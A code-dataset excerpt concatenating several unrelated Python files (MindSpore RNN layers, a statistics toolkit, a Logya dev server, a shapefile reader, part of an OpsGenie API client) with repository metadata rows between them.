hidden_size = h.shape[-1]
zero_output = P.ZerosLike()(h_t)
seq_length = P.Cast()(seq_length, mindspore.float16)
seq_length = P.BroadcastTo((hidden_size, -1))(seq_length)
seq_length = P.Cast()(seq_length, mindspore.int32)
seq_length = P.Transpose()(seq_length, (1, 0))
outputs = []
state_t = h_t
t = 0
while t < time_step:
h_t = self.cell(self.squeeze_0(x[t: t + 1]), state_t, w_ih, w_hh, b_ih, b_hh)
seq_cond = seq_length > t
if self.is_lstm:
state_t_0 = P.Select()(seq_cond, h_t[0], state_t[0])
state_t_1 = P.Select()(seq_cond, h_t[1], state_t[1])
output = P.Select()(seq_cond, h_t[0], zero_output)
state_t = (state_t_0, state_t_1)
else:
state_t = P.Select()(seq_cond, h_t, state_t)
output = P.Select()(seq_cond, h_t, zero_output)
outputs.append(output)
t += 1
outputs = P.Stack()(outputs)
return outputs, state_t
def construct(self, x, h, seq_length, w_ih, w_hh, b_ih, b_hh):
"""
variable_recurrent
"""
return self.variable_recurrent(x, h, seq_length, w_ih, w_hh, b_ih, b_hh)
class RNNBase(nn.Cell):
"""RNN Base"""
def __init__(self, mode, input_size, hidden_size, num_layers=1,
has_bias=True, batch_first=False, dropout=0, bidirectional=False):
super(RNNBase, self).__init__()
if not 0 <= dropout <= 1:
raise ValueError("dropout should be a number in range [0, 1] "
"representing the probability of an element being "
"zeroed")
if dropout > 0 and num_layers == 1:
logger.warning("dropout option adds dropout after all but last "
"recurrent layer, so non-zero dropout expects "
"num_layers greater than 1, but got dropout={} and "
"num_layers={}".format(dropout, num_layers))
if mode == "LSTM":
gate_size = 4 * hidden_size
elif mode == "GRU":
gate_size = 3 * hidden_size
elif mode == "RNN_TANH":
gate_size = hidden_size
elif mode == "RNN_RELU":
gate_size = hidden_size
else:
raise ValueError("Unrecognized RNN mode: " + mode)
self.is_ascend = context.get_context("device_target") == "Ascend"
if self.is_ascend:
self.reverse = P.ReverseV2([0])
self.reverse_sequence = P.ReverseSequence(0, 1)
else:
self.reverse = Reverse(0)
self.reverse_sequence = ReverseSequence(0, 1)
self.hidden_size = hidden_size
self.batch_first = batch_first
self.num_layers = num_layers
self.dropout = dropout
self.dropout_op = nn.Dropout(float(1 - dropout))
self.bidirectional = bidirectional
self.has_bias = has_bias
self.rnn = DynamicRNN(mode)
num_directions = 2 if bidirectional else 1
self.is_lstm = mode == "LSTM"
self.w_ih_list = []
self.w_hh_list = []
self.b_ih_list = []
self.b_hh_list = []
stdv = 1 / math.sqrt(self.hidden_size)
for layer in range(num_layers):
for direction in range(num_directions):
layer_input_size = input_size if layer == 0 else hidden_size * num_directions
suffix = '_reverse' if direction == 1 else ''
init_w_ih = Tensor(np.random.uniform(-stdv, stdv, (gate_size, layer_input_size)).astype(np.float32))
init_w_hh = Tensor(np.random.uniform(-stdv, stdv, (gate_size, hidden_size)).astype(np.float32))
self.w_ih_list.append(Parameter(init_w_ih, name='weight_ih_l{}{}'.format(layer, suffix)))
self.w_hh_list.append(Parameter(init_w_hh, name='weight_hh_l{}{}'.format(layer, suffix)))
if has_bias:
init_b_ih = Tensor(np.random.uniform(-stdv, stdv, (gate_size)).astype(np.float32))
init_b_hh = Tensor(np.random.uniform(-stdv, stdv, (gate_size)).astype(np.float32))
self.b_ih_list.append(Parameter(init_b_ih, name='bias_ih_l{}{}'.format(layer, suffix)))
self.b_hh_list.append(Parameter(init_b_hh, name='bias_hh_l{}{}'.format(layer, suffix)))
self.w_ih_list = ParameterTuple(self.w_ih_list)
self.w_hh_list = ParameterTuple(self.w_hh_list)
self.b_ih_list = ParameterTuple(self.b_ih_list)
self.b_hh_list = ParameterTuple(self.b_hh_list)
def _stacked_bi_dynamic_rnn(self, x, h, seq_length):
"""stacked bidirectional dynamic_rnn"""
pre_layer = x
h_n = ()
c_n = ()
output = 0
for i in range(self.num_layers):
offset = i * 2
if self.has_bias:
w_f_ih, w_f_hh = self.w_ih_list[offset], self.w_hh_list[offset]
b_f_ih, b_f_hh = self.b_ih_list[offset], self.b_hh_list[offset]
w_b_ih, w_b_hh = self.w_ih_list[offset + 1], self.w_hh_list[offset + 1]
b_b_ih, b_b_hh = self.b_ih_list[offset + 1], self.b_hh_list[offset + 1]
else:
w_f_ih, w_f_hh = self.w_ih_list[offset], self.w_hh_list[offset]
w_b_ih, w_b_hh = self.w_ih_list[offset + 1], self.w_hh_list[offset + 1]
b_f_ih, b_f_hh, b_b_ih, b_b_hh = None, None, None, None
if self.is_lstm:
h_f_i = (h[0][offset], h[1][offset])
h_b_i = (h[0][offset + 1], h[1][offset + 1])
else:
h_f_i = h[offset]
h_b_i = h[offset + 1]
if seq_length is None:
x_b = self.reverse(pre_layer)
else:
x_b = self.reverse_sequence(pre_layer, seq_length)
output_f, h_t_f = self.rnn(pre_layer, h_f_i, seq_length, w_f_ih, w_f_hh, b_f_ih, b_f_hh)
output_b, h_t_b = self.rnn(x_b, h_b_i, seq_length, w_b_ih, w_b_hh, b_b_ih, b_b_hh)
if seq_length is None:
output_b = self.reverse(output_b)
else:
output_b = self.reverse_sequence(output_b, seq_length)
output = P.Concat(2)((output_f, output_b))
pre_layer = self.dropout_op(output) if (self.dropout != 0 and i < self.num_layers - 1) else output
if self.is_lstm:
h_n += (h_t_f[0], h_t_b[0],)
c_n += (h_t_f[1], h_t_b[1],)
else:
h_n += (h_t_f, h_t_b,)
if self.is_lstm:
h_n = P.Concat(0)(h_n)
c_n = P.Concat(0)(c_n)
h_n = h_n.view(h[0].shape)
c_n = c_n.view(h[1].shape)
res = (h_n.view(h[0].shape), c_n.view(h[1].shape))
else:
h_n = P.Concat(0)(h_n)
res = h_n.view(h.shape)
return output, res
def _stacked_dynamic_rnn(self, x, h, seq_length):
"""stacked mutil_layer dynamic_rnn"""
pre_layer = x
h_n = ()
c_n = ()
output = 0
for i in range(self.num_layers):
if self.has_bias:
w_ih, w_hh, b_ih, b_hh = self.w_ih_list[i], self.w_hh_list[i], self.b_ih_list[i], self.b_hh_list[i]
else:
w_ih, w_hh = self.w_ih_list[i], self.w_hh_list[i]
b_ih, b_hh = None, None
if self.is_lstm:
h_i = (h[0][i], h[1][i])
else:
h_i = h[i]
output, h_t = self.rnn(pre_layer, h_i, seq_length, w_ih, w_hh, b_ih, b_hh)
pre_layer = self.dropout_op(output) if (self.dropout != 0 and i < self.num_layers - 1) else output
if self.is_lstm:
h_n += (h_t[0],)
c_n += (h_t[1],)
else:
h_n += (h_t,)
if self.is_lstm:
h_n = P.Concat(0)(h_n)
c_n = P.Concat(0)(c_n)
h_n = h_n.view(h[0].shape)
c_n = c_n.view(h[1].shape)
res = (h_n.view(h[0].shape), c_n.view(h[1].shape))
else:
h_n = P.Concat(0)(h_n)
res = h_n.view(h.shape)
return output, res
def construct(self, x, h=None, seq_length=None):
"""construct"""
max_batch_size = x.shape[0] if self.batch_first else x.shape[1]
num_directions = 2 if self.bidirectional else 1
if h is None:
h = _init_state((self.num_layers * num_directions, max_batch_size, self.hidden_size), x.dtype, self.is_lstm)
if self.batch_first:
x = P.Transpose()(x, (1, 0, 2))
if self.bidirectional:
x, h = self._stacked_bi_dynamic_rnn(x, h, seq_length)
else:
x, h = self._stacked_dynamic_rnn(x, h, seq_length)
if self.batch_first:
x = P.Transpose()(x, (1, 0, 2))
return x, h
class RNN(RNNBase):
"""RNN"""
def __init__(self, *args, **kwargs):
if 'nonlinearity' in kwargs:
if kwargs['nonlinearity'] == 'tanh':
mode = 'RNN_TANH'
elif kwargs['nonlinearity'] == 'relu':
mode = 'RNN_RELU'
else:
raise ValueError("Unknown nonlinearity '{}'".format(
kwargs['nonlinearity']))
del kwargs['nonlinearity']
else:
mode = 'RNN_TANH'
super(RNN, self).__init__(mode, *args, **kwargs)
class GRU(RNNBase):
"""GRU"""
def __init__(self, *args, **kwargs):
mode = 'GRU'
super(GRU, self).__init__(mode, *args, **kwargs)
class LSTM(RNNBase):
"""LSTM"""
def __init__(self, *args, **kwargs):
mode = 'LSTM'
super(LSTM, self).__init__(mode, *args, **kwargs)
self.support_non_tensor_inputs = True
| 39.644444 | 120 | 0.556054 |
9673d6b6f3e228139e448279a49f0668cd2fba33
| 4,251 |
py
|
Python
|
Util/DataToolkit.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 1,107 |
2016-09-21T02:18:36.000Z
|
2022-03-29T02:52:12.000Z
|
Util/DataToolkit.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 18 |
2016-12-22T10:24:47.000Z
|
2022-03-11T23:18:43.000Z
|
Util/DataToolkit.py
|
leoatchina/MachineLearning
|
071f2c0fc6f5af3d9550cfbeafe8d537c35a76d3
|
[
"MIT"
] | 776 |
2016-12-21T12:08:08.000Z
|
2022-03-21T06:12:08.000Z
|
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
# noinspection PyTypeChecker
class DataToolkit:
def __init__(self, data):
self._data = np.asarray(data)
self._sorted_data = np.sort(self._data)
self._n = len(self._data)
self._mean = self._variance = self._std = None
self._moments = []
self._q1 = self._q3 = None
def get_moment(self, k):
if len(self._moments) < k:
self._moments += [None] * (k - len(self._moments))
if self._moments[k-1] is None:
self._moments[k-1] = np.sum((self._data - self.mean) ** k) / self._n
return self._moments[k-1]
def get_mp(self, p):
_np = self._n * p
int_np = int(_np)
if not int(_np % 1):
return self._sorted_data[int_np]
return 0.5 * (self._sorted_data[int_np-1] + self._sorted_data[int_np])
@property
def min(self):
return self._sorted_data[0]
@property
def max(self):
return self._sorted_data[-1]
@property
def mean(self):
if self._mean is None:
self._mean = self._data.mean()
return self._mean
@property
def variance(self):
if self._variance is None:
self._variance = np.sum((self._data - self.mean) ** 2) / (self._n - 1)
return self._variance
@property
def std(self):
if self._std is None:
self._std = (np.sum((self._data - self.mean) ** 2) / (self._n - 1)) ** 0.5
return self._std
@property
def g1(self):
n, moment3 = self._n, self.get_moment(3)
return n ** 2 * moment3 / ((n - 1) * (n - 2) * self.std ** 3)
@property
def g2(self):
n, moment4 = self._n, self.get_moment(4)
return n**2*(n+1)*moment4 / ((n-1)*(n-2)*(n-3)*self.std**4) - 3*(n-1)**2/((n-2)*(n-3))
@property
def med(self):
n, hn = self._n, int(self._n*0.5)
if n & 1:
return self._sorted_data[hn-1]
return 0.5 * (self._sorted_data[hn-1] + self._sorted_data[hn])
@property
def q1(self):
if self._q1 is None:
self._q1 = self.get_mp(0.25)
return self._q1
@property
def q3(self):
if self._q3 is None:
self._q3 = self.get_mp(0.75)
return self._q3
@property
def r(self):
return self._sorted_data[-1] - self._sorted_data[0]
@property
def r1(self):
return self.q3 - self.q1
@property
def trimean(self):
return 0.25 * (self.q1 + self.q3) + 0.5 * self.med
@property
def loval(self):
return self.q1 - 1.5 * self.r1
@property
def hival(self):
return self.q3 + 1.5 * self.r1
def draw_histogram(self, bin_size=10):
bins = np.arange(self._sorted_data[0]-self.r1, self._sorted_data[-1]+self.r1, bin_size)
plt.hist(self._data, bins=bins, alpha=0.5)
plt.title("Histogram (bin_size: {})".format(bin_size))
plt.show()
def qq_plot(self):
stats.probplot(self._data, dist="norm", plot=plt)
plt.show()
def box_plot(self):
plt.figure()
plt.boxplot(self._data, vert=False, showmeans=True)
plt.show()
if __name__ == '__main__':
toolkit = DataToolkit([
53, 70.2, 84.3, 55.3, 78.5, 63.5, 71.4, 53.4, 82.5, 67.3, 69.5, 73, 55.7, 85.8, 95.4, 51.1, 74.4,
54.1, 77.8, 52.4, 69.1, 53.5, 64.3, 82.7, 55.7, 70.5, 87.5, 50.7, 72.3, 59.5
])
print("mean : ", toolkit.mean)
print("variance : ", toolkit.variance)
print("g1 : ", toolkit.g1)
print("g2 : ", toolkit.g2)
print("med : ", toolkit.med)
print("r : ", toolkit.r)
print("q3 : ", toolkit.q3)
print("q1 : ", toolkit.q1)
print("r1 : ", toolkit.r1)
print("trimean : ", toolkit.trimean)
print("hival : ", toolkit.hival)
print("loval : ", toolkit.loval)
print("min : ", toolkit.min)
print("max : ", toolkit.max)
toolkit.draw_histogram()
toolkit.qq_plot()
toolkit.box_plot()
| 29.93662 | 106 | 0.531169 |
96b7cab8806014b3e3487abbbcbfc345d5493c03
| 1,147 |
py
|
Python
|
etc/db/producer.py
|
huberthoegl/tsgrain
|
405d0ba8b98c2afa950d27294e55cd1e07506db4
|
[
"Apache-2.0"
] | 1 |
2021-06-15T08:59:02.000Z
|
2021-06-15T08:59:02.000Z
|
etc/db/producer.py
|
huberthoegl/tsgrain
|
405d0ba8b98c2afa950d27294e55cd1e07506db4
|
[
"Apache-2.0"
] | null | null | null |
etc/db/producer.py
|
huberthoegl/tsgrain
|
405d0ba8b98c2afa950d27294e55cd1e07506db4
|
[
"Apache-2.0"
] | null | null | null |
# tinydb.readthedocs.io/en/latest/getting-started.html
'''
cat db.json | jq
or
cat db.json | python -m json.tool
Pretty to compact convertion:
cat db.json.pretty | jq -c
'''
import os, time
from tinydb import TinyDB, Query
if os.path.exists('dbtest.json'):
os.unlink('dbtest.json')
db = TinyDB('dbtest.json')
docid = db.insert({'type': 'startcnt', 'val': 0}) # insert document
docid = db.insert({'type': 'mandelay', 'val': 5})
for item in db:
print("0>", item)
ablaeufe = db.table('Ablaufliste', cache_size=0) # disable cache
n = 0
duration = 20
# while n < 20:
while True:
s = input("{}> ".format(n))
doc_id = ablaeufe.insert({'start': '20-05-11T22:00',
'duration': duration,
'courts': '*******',
'days': '1'})
# cycle: no, 12h, d, ...
duration += 5
n += 1
'''
r = db.all()
print("all>", r)
for i, item in enumerate(db):
print(i, "->", item)
print("%%>", ablaeufe.all())
for item in ablaeufe:
print("=>", item)
'''
# db.truncate() # alles loeschen
# print(db.all())
| 18.206349 | 68 | 0.53531 |
73bea79b74ece13a4dbcd8f6b3f401bd79555577
| 2,681 |
py
|
Python
|
txt2xml.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
txt2xml.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
txt2xml.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
txt_dir = '/home/TestData/DPI_DATA/guangzhou_LTE/DPI_test_data/2'
xml_dir = '/home/ligang/xml'
xml_template = '/home/test_template.xml'
exclude = ['pcapstc.txt', 'badfile.txt']
#------------------------------------------------------------------------------------------
import os
#find all txt files
txt_files = []
if not os.path.exists(txt_dir):
print('ERROR: %s not exist!' % txt_dir)
exit()
for file in os.listdir(txt_dir):
full_name = os.path.join(txt_dir, file)
if os.path.isfile(full_name) and file.split('.')[-1] == 'txt' and file not in exclude:
txt_files.append(full_name)
txt_files.sort()
print('INFO: find %d txt files in %s' % (len(txt_files), txt_dir))
#read all txt files
all_data = {}
for txt in txt_files:
try:
with open(txt) as f:
lines = f.readlines()[4:]
all_data.setdefault(txt, lines)
except:
print('ERROR: read %s fail' % txt)
continue
#generate xml files
#it's hard to parse as xml file because of gb2312 and hanzi
if not os.path.exists(xml_dir):
os.mkdir(xml_dir)
with open(xml_template) as template:
template_content = template.read()
for key in all_data:
file = os.path.split(key)[-1]
short_name = file.split('.')[0].split('_')
service_type = short_name[0]
short_name.remove(service_type)
lines = all_data[key]
print('%s' % file)
for i in range(0, len(lines)):
try:
words = lines[i].split()
xml_file_name = service_type + '_' + words[3] + '_' + '_'.join(short_name) + '_' + str(i+1) + '.xml'
xml_file_fullname = os.path.join(xml_dir, xml_file_name)
with open(xml_file_fullname, 'w') as xml_file:
template_content_copy = template_content
template_content_copy = template_content_copy.replace('template_datasource', file.split('.')[0])
template_content_copy = template_content_copy.replace('template_sgsndataip', words[0])
template_content_copy = template_content_copy.replace('template_ggsndataip', words[1])
template_content_copy = template_content_copy.replace('template_srcip', words[2])
template_content_copy = template_content_copy.replace('template_dstip', words[3])
template_content_copy = template_content_copy.replace('template_val', words[6]+','+words[7]+','+words[8]+','+words[9])
xml_file.write(template_content_copy)
print(' %s' % xml_file_name)
except:
print('ERROR: %s format error' % file)
break
print('INFO: finish generate xml files in %s' % xml_dir)
| 38.3 | 134 | 0.616188 |
73efdfd63c8f43ce97aa52580cb741308de9a835
| 3,263 |
py
|
Python
|
logya/server.py
|
yaph/logya
|
9647f58a0b8653b56ad64332e235a76cab3acda9
|
[
"MIT"
] | 12 |
2015-03-04T03:23:56.000Z
|
2020-11-17T08:09:17.000Z
|
logya/server.py
|
elaOnMars/logya
|
a9f256ac8840e21b348ac842b35683224e25b613
|
[
"MIT"
] | 78 |
2015-01-05T11:40:41.000Z
|
2022-01-23T21:05:39.000Z
|
logya/server.py
|
elaOnMars/logya
|
a9f256ac8840e21b348ac842b35683224e25b613
|
[
"MIT"
] | 6 |
2015-04-20T06:58:42.000Z
|
2022-01-31T00:36:29.000Z
|
# -*- coding: utf-8 -*-
import http.server
import socketserver
from shutil import copyfile
from urllib.parse import unquote, urlparse
from logya.core import Logya
from logya.content import read, write_collection, write_page
from logya.template import env
class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
"""SimpleHTTPRequestHandler based class to return resources."""
L: Logya
def __init__(self, *args):
super(HTTPRequestHandler, self).__init__(*args, directory=self.L.paths.public.as_posix())
def do_GET(self):
update_resource(self.path, self.L)
super(HTTPRequestHandler, self).do_GET()
def update_page(url: str, L: Logya):
"""Update content or collection page."""
if content := L.doc_index.get(url):
path_rel = content['path'].relative_to(L.paths.content)
content['doc'] = read(content['path'], path_rel, L.markdown_extensions)
if L.collections:
L.update_collections(content['doc'])
# Always write doc because of possible template changes.
write_page(L.paths.public, content['doc'])
L.info(f'Refreshed doc: {url}')
return True
if content := L.collection_index.get(url):
write_collection(L.paths.public, content)
L.info(f'Refreshed collection: {url}')
return True
def update_resource(path: str, L: Logya) -> None:
"""Update resource corresponding to given url.
Resources that exist in the `static` directory are updated if they are newer than the destination file.
For other HTML resources the whole `L.doc_index` is updated and the destination is newly written."""
# Use only the actual path and ignore possible query params (see issue #3).
url = unquote(urlparse(path).path)
url_rel = url.lstrip('/')
# If a static file is requested update it and return.
src_static = L.paths.static.joinpath(url_rel)
if src_static.is_file():
dst_static = L.paths.public.joinpath(url_rel)
dst_static.parent.mkdir(exist_ok=True)
if not dst_static.exists() or src_static.stat().st_mtime > dst_static.stat().st_mtime:
L.info(f'Update static resource: {dst_static}')
copyfile(src_static, dst_static)
return
# Update content or collection existing in respective index.
if update_page(url, L):
return
# Rebuild indexes for other HTML file requests and try again to update page in case of new content.
if url.endswith(('/', '.html', '.htm')):
L.info(f'Rebuild site for request URL: {url}')
L.build()
if not update_page(url, L):
L.info(f'URL not found: {url}')
def serve(dir_site: str, verbose: bool, host: str, port: int, **kwargs) -> None:
L = Logya(dir_site=dir_site, verbose=verbose)
L.build()
# Make Logya object accessible to server.
HTTPRequestHandler.L = L
# Make sure absolute links work.
base_url = f'http://{host}:{port}'
env.globals['base_url'] = base_url
# Avoid "OSError: [Errno 98] Address already in use"
socketserver.TCPServer.allow_reuse_address = True
with socketserver.TCPServer((host, port), HTTPRequestHandler) as httpd:
print(f'Serving on {base_url}')
httpd.serve_forever()
| 35.857143 | 107 | 0.676984 |
f7658db9067c802c7cce5e6ac067db9ebb8fdff3
| 1,460 |
py
|
Python
|
forge/lib/shapefile_utils.py
|
Pandinosaurus/3d-forge
|
d631e14a9351911c3e5612c73c1608d97ed547d2
|
[
"BSD-3-Clause"
] | 31 |
2015-07-13T15:36:50.000Z
|
2022-02-07T21:37:51.000Z
|
forge/lib/shapefile_utils.py
|
Pandinosaurus/3d-forge
|
d631e14a9351911c3e5612c73c1608d97ed547d2
|
[
"BSD-3-Clause"
] | 109 |
2015-04-24T10:03:24.000Z
|
2019-04-12T13:34:01.000Z
|
forge/lib/shapefile_utils.py
|
Pandinosaurus/3d-forge
|
d631e14a9351911c3e5612c73c1608d97ed547d2
|
[
"BSD-3-Clause"
] | 16 |
2015-10-03T06:03:22.000Z
|
2022-03-31T08:24:37.000Z
|
# -*- coding: utf-8 -*-
import re
from osgeo import ogr
class ShpToGDALFeatures(object):
def __init__(self, shpFilePath=None):
if shpFilePath is None:
raise Exception('No shapefile path provided')
if re.search(r'(\.shp)$', shpFilePath) is None:
raise TypeError(
'Only shapefiles are supported. Provided path %s' % shpFilePath
)
self.shpFilePath = shpFilePath
self.drvName = 'ESRI Shapefile'
self.drv = ogr.GetDriverByName(self.drvName)
# Returns a list of GDAL Features
def __read__(self):
dataSource = self._getDatasource()
# 0 refers to read-only
layer = dataSource.GetLayer()
features = [feature for feature in layer]
if len(features) == 0:
return features
# raise Exception('Empty shapefile')
geometryType = features[0].GetGeometryRef().GetGeometryName()
if geometryType != 'POLYGON':
raise TypeError('Unsupported input geometry type: %s' % geometryType)
return features
def getFeatures(self):
dataSource = self._getDatasource()
layer = dataSource.GetLayer()
for feature in layer:
yield feature
def _getDatasource(self):
dataSource = self.drv.Open(self.shpFilePath, 0)
if dataSource is None:
raise IOError('Could not open %s' % self.shpFilePath)
return dataSource
| 31.73913 | 81 | 0.615068 |
e3c400832f0c5110a650b72648714c8b2456ef15
| 44,052 |
py
|
Python
|
Packs/OpsGenie/Integrations/OpsGenieV3/OpsGenieV3.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | null | null | null |
Packs/OpsGenie/Integrations/OpsGenieV3/OpsGenieV3.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | 2 |
2021-12-26T07:34:37.000Z
|
2021-12-26T07:49:34.000Z
|
Packs/OpsGenie/Integrations/OpsGenieV3/OpsGenieV3.py
|
PAM360/content
|
928aac9c586c6e593b2a452c402a37cb5df28dac
|
[
"MIT"
] | null | null | null |
from requests import Response
import demistomock as demisto
from typing import Callable, Tuple
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
from CommonServerUserPython import * # noqa
# Disable insecure warnings
DEFAULT_POLL_INTERVAL = 5
requests.packages.urllib3.disable_warnings() # pylint: disable=no-member
''' CONSTANTS '''
DEFAULT_POLL_TIMEOUT = 60
INTEGRATION_NAME = 'Opsgenie'
ALERTS_SUFFIX = "alerts"
REQUESTS_SUFFIX = "requests"
SCHEDULE_SUFFIX = "schedules"
INCIDENTS_SUFFIX = "incidents"
ESCALATION_SUFFIX = "escalations"
TEAMS_SUFFIX = "teams"
DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
INCIDENT_TYPE = 'Incidents'
ALERT_TYPE = 'Alerts'
ALL_TYPE = 'All'
''' CLIENT CLASS '''
class Client(BaseClient):
"""
OpsGenieV3 Client
"""
def get_request(self, args: dict) -> Response:
url_suffix = "/v1" if args.get('request_type') == INCIDENTS_SUFFIX else "/v2"
return self._http_request(
method='GET',
url_suffix=f"{url_suffix}/{args.get('request_type')}/{REQUESTS_SUFFIX}/"
f"{args.get('request_id')}",
ok_codes=(404, 200),
resp_type='response')
def get_paged(self, args: dict):
data = self._http_request(
method='GET',
full_url=args.get('paging')
)
return data
@staticmethod
def responders_to_json(responders: List, responder_key: str, one_is_dict: bool = False) \
-> Dict[str, Union[List, Dict]]: # type: ignore
"""
:param responders: the responders list which we get from demisto.args()
:param responder_key: Some of the api calls need "responder" and others "responders" as a
key in the responders jason
:param one_is_dict: Some of the api calls need when there is one responder it as a dict
and others as a list
:return json_responders: reformatted respondres dict
"""
if not responders:
return {}
if len(responders) % 3 != 0:
raise DemistoException("responders must be list of: responder_type, value_type, value")
responders_triple = list(zip(responders[::3], responders[1::3], responders[2::3]))
json_responders = {responder_key: []} # type: ignore
for responder_type, value_type, value in responders_triple:
if responder_type == "user" and value_type == "name":
value_type = "username"
json_responders[responder_key].append({value_type: value, "type": responder_type})
response = json_responders
if len(responders_triple) == 1 and one_is_dict:
response = {responder_key: json_responders[responder_key][0]}
return response # type: ignore
def create_alert(self, args: dict):
args['responders'] = argToList(args.get('responders'))
args.update(Client.responders_to_json(args.get('responders', []), "responders"))
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}",
json_data=args)
def get_alert(self, alert_id: int):
return self._http_request(method='GET',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{alert_id}"
)
def list_alerts(self, args: dict):
args['tags'] = argToList(args.get('tags'))
params = {
"limit": args.get("limit"),
"offset": args.get("offset"),
"query": Client.build_query(args)
}
res = self._http_request(method='GET',
url_suffix=f"/v2/{ALERTS_SUFFIX}",
params=params
)
if len(res.get("data", [])) > 0:
for result in res.get("data"):
result['event_type'] = ALERT_TYPE
return res
def delete_alert(self, args: dict):
return self._http_request(method='DELETE',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}",
json_data=args)
def ack_alert(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/"
f"{args.get('alert-id')}/acknowledge",
json_data=args)
def close_alert(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/close",
json_data=args)
def assign_alert(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/assign",
json_data=args)
def add_responder_alert(self, args: dict):
alert_id = args.get('alert-id')
identifier = args.get('identifierType', 'id')
args['responders'] = argToList(args.get('responders'))
args.update(Client.responders_to_json(responders=args.get('responders', []),
responder_key="responder",
one_is_dict=True))
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{alert_id}/responders",
params={"identifierType": identifier},
json_data=args)
def get_escalation(self, args: dict):
if args.get("escalation_id") and args.get("escalation_name"):
raise DemistoException("Either escalation_id or escalation_name should be provided.")
identifier_type = "id" if args.get("escalation_id") else "name"
escalation = args.get("escalation_id", None) or args.get("escalation_name", None)
return self._http_request(method='GET',
url_suffix=f"/v2/{ESCALATION_SUFFIX}/{escalation}",
params={"identifierType": identifier_type}
)
def get_escalations(self):
return self._http_request(method='GET',
url_suffix=f"/v2/{ESCALATION_SUFFIX}"
)
def escalate_alert(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/escalate",
json_data=args)
def add_alert_tag(self, args: dict):
args['tags'] = argToList(args.get('tags'))
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/tags",
json_data=args)
def remove_alert_tag(self, args: dict):
args['tags'] = argToList(args.get('tags'))
return self._http_request(method='DELETE',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/tags",
params={"tags": args.get('tags')},
json_data=args)
def get_alert_attachments(self, args: dict):
attachment_id = args.get("attachment_id")
if attachment_id:
return self._http_request(method='GET',
url_suffix=f"/v2/{ALERTS_SUFFIX}/attachments/{attachment_id}")
return self._http_request(method='GET',
url_suffix=f"/v2/{ALERTS_SUFFIX}/"
f"{args.get('alert-id')}/attachments")
def get_schedule(self, args: dict):
if not (args.get("schedule_id") and args.get("schedule_name")):
raise DemistoException("Either schedule_id or schedule_name should be provided.")
identifier_type = "id" if args.get("schedule_id") else "name"
schedule = args.get("schedule_id", None) or args.get("schedule_name", None)
return self._http_request(method='GET',
url_suffix=f"/v2/{SCHEDULE_SUFFIX}/{schedule}",
params={"identifierType": identifier_type}
)
def list_schedules(self):
return self._http_request(method='GET',
url_suffix=f"/v2/{SCHEDULE_SUFFIX}"
)
def get_schedule_override(self, args: dict):
identifier_type = "id" if args.get("schedule_id") else "name"
schedule = args.get("schedule_id", None) or args.get("schedule_name", None)
return self._http_request(method='GET',
url_suffix=f"/v2/{SCHEDULE_SUFFIX}/{schedule}/"
f"overrides/{args.get('override_alias')}",
params={"scheduleIdentifierType": identifier_type}
)
def list_schedule_overrides(self, args: dict):
identifier_type = "id" if args.get("schedule_id") else "name"
schedule = args.get("schedule_id", None) or args.get("schedule_name", None)
return self._http_request(method='GET',
url_suffix=f"/v2/{SCHEDULE_SUFFIX}/{schedule}/overrides",
params={"scheduleIdentifierType": identifier_type}
)
def get_on_call(self, args: dict):
return self._http_request(method='GET', url_suffix=f"/v2/{SCHEDULE_SUFFIX}/" f"{args.get('schedule')}/on-calls",
params={"scheduleIdentifierType": args.get('scheduleIdentifierType')})
def create_incident(self, args: dict):
args['responders'] = argToList(args.get('responders'))
args.update(Client.responders_to_json(args.get('responders', []), "responders"))
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/create",
json_data=args)
def delete_incident(self, args: dict):
return self._http_request(method='DELETE',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/{args.get('incident_id')}",
json_data=args)
def get_incident(self, args: dict):
return self._http_request(method='GET',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/{args.get('incident_id')}",
)
@staticmethod
def build_query(args: dict) -> str:
query = ""
if args.get("query", ""):
query = args.get("query", "")
if args.get("is_fetch_query", False) or not args.get("query", ""):
status = args.get("status", ALL_TYPE)
if status != ALL_TYPE:
query += ' AND ' if query else ''
query += f'status={status.lower()}'
priority = argToList(args.get("priority", [ALL_TYPE]))
if ALL_TYPE not in priority:
query += ' AND ' if query else ''
priority_parsed = ' OR '.join([p for p in priority])
query += f'priority: ({priority_parsed})'
tags = argToList(args.get("tags", []))
if tags:
query += ' AND ' if query else ''
tag_parsed = ' OR '.join([t for t in tags])
query += f'tag: ({tag_parsed})'
return query
def list_incidents(self, args: dict):
args['tags'] = argToList(args.get('tags'))
params = {
"limit": args.get("limit"),
"offset": args.get("offset"),
"query": Client.build_query(args)
}
